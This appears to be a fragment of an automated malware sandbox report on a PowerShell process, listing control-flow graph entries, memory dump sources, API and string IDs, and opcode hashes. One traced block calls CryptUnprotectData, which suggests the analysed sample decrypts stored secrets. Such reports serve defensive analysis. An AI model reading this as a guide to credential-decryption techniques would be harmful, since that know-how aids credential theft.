                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:4
                                                                      Total number of Limit Nodes:0
                                                                      [Execution graph rendered as an image in the original report; the traced path ends in a CryptUnprotectData call]

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph rendered as an image in the original report; the traced block calls CryptUnprotectData]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.1754133754.00007FFAAB890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_7ffaab890000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: 6w
                                                                      • API String ID: 834300711-2008936911
                                                                      • Opcode ID: 45de892f169315131d820bfd3149950c6de8eec5f239b22c3b3129740527a461
                                                                      • Instruction ID: 7cd1a1cc0b6b70c6b2d40d554c23b4e9bb5c73a550c4efc1aabf4d88308c1c38
                                                                      • Opcode Fuzzy Hash: 45de892f169315131d820bfd3149950c6de8eec5f239b22c3b3129740527a461
                                                                      • Instruction Fuzzy Hash: D551E971A1CB489FDB58EB6CD8056B97BE4FF5A311F0441BEE04DC3292DA24A85587C2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.1754593238.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_7ffaab960000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0A_H$r6w$r6w$r6w$r6w$r6w
                                                                      • API String ID: 0-2233467570
                                                                      • Opcode ID: 6affa3da55a3754dde488fa174794ca2f59336af863f52afdbca8fe5fa0bb047
                                                                      • Instruction ID: 8dd18674e61957d50e4f16a44fcca7cc64032f859dceeabc11ae16749cedc3ab
                                                                      • Opcode Fuzzy Hash: 6affa3da55a3754dde488fa174794ca2f59336af863f52afdbca8fe5fa0bb047
                                                                      • Instruction Fuzzy Hash: 9F32483290DB898FE795DB2888E46B4BBE1EF56350B0841BED05DC71A3DE29AC45C7C1